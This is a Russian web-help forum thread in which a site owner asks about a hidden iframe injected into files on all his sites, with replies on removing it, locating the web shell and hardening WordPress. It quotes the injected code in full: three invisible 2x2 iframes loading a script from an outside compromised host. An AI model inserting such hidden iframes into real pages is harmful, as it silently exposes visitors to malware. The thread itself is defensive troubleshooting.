• Регистрация

В файлы на все сайты залез такой код: <iframe src="http://www.zw52.ru...

0 голосов
1,040 просмотров

В файлы на все сайты залез такой код:
<iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe><iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe><iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe>

Сайт начинает работать после удаления данного кода.

спросил 15 Янв, 13 от аноним

2 Ответы

0 голосов
проблема вставки данного кода iframe заключается в уязвимости либо самого wordpress, либо какого-нибудь компонента. шелл может находится здесь
./<<DOMAIN>>/wp-content/themes/toolbox/error.php

вычистить можно командой

    find . -type f -name '*.php' -exec perl -pi -e 's/\<iframe\ src\=\"http\:\/\/www.z.*frame\>//g' '{}' \;
ответил 15 Янв, 13 от vadim s. sabinich (3,260 баллов)
+1 голос
1) Блокируй доступ к сайту (deny from all, allow from 127.0.0.1) через штаккесс

2) Выпиливай ифреймы в шаблонах

3) Обновляй cms до последней версии

4) Поставь на сайты какой-нибудь веб-фаирвол подключаемый через auto_prepend_file

5) Не забудь найти на сайте все недавно изменённые файлы. Если найдутся те которые изменяться не должны (типа *.php в дире includes) - замени их на дистрибутивные - в них добавлен бекдор.
ответил 13 Март, 13 от pascal (300 баллов)
Ты уже который раз упоминаешь про веб-файрволы. Не мог бы подробней рассказать об этом?
Аке. Напишу как домой приеду. Я кстати на работку устроился)
поздравляю! совсем большой стал 8))
...